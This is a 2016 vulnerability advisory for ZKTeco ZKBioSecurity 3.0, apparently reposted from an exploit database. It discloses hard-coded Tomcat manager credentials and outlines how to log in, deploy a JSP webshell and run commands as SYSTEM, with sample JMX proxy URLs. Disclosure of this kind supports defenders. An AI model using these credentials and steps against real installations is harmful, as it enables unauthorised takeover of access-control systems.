###########################

# ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution Vulnerability

###########################

ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution


Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
Product web page: http://www.zkteco.com
Affected version: 3.0.1.0_R_230
Platform: 3.0.1.0_R_230
Personnel: 1.0.1.0_R_1916
Access: 6.0.1.0_R_1757
Elevator: 2.0.1.0_R_777
Visitor: 2.0.1.0_R_877
Video:2.0.1.0_R_489
Adms: 1.0.1.0_R_197

Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
platform developed by ZKTeco. It contains four integrated modules: access
control, video linkage, elevator control and visitor management. With an
optimized system architecture designed for high level biometric identification
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
solution for a whole new user experience.

Desc: The ZKBioSecurity solution suffers from a use of hard-coded credentials.
The application comes bundled with a pre-configured apache tomcat server and an
exposed 'manager' application that after authenticating with the credentials:
username: zkteco, password: zkt123, located in tomcat-users.xml file, it allows
malicious WAR archive containing a JSP application to be uploaded, thus giving
the attacker the ability to execute arbitrary code with SYSTEM privileges.

Ref: https://www.exploit-db.com/exploits/31433/


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Apache-Coyote/1.1
Apache Tomcat/7.0.56


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5362
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php


18.07.2016

--


Contents of tomcat-users.xml:
-----------------------------

C:Program Files (x86)BioSecurityMainResourcetomcatconftomcat-users.xml:

<?xml version='1.0' encoding='utf-8'?>
...
...
...
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>
</tomcat-users>

-----------------------------


Open Manager application and login:
-----------------------------------

http://127.0.0.1:8088/manager (zkteco:zkt123)


Deploy JSP webshell, issue command:
-----------------------------------

- Request: whoami
- Response: nt authoritysystem


call the findConnectors() method of the Service use:
----------------------------------------------------

http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=

Response:

OK - Operation findConnectors returned:
Connector[HTTP/1.1-8088]
Connector[AJP/1.3-8019]


List of all loaded servlets:
----------------------------

http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-08-31]

###########################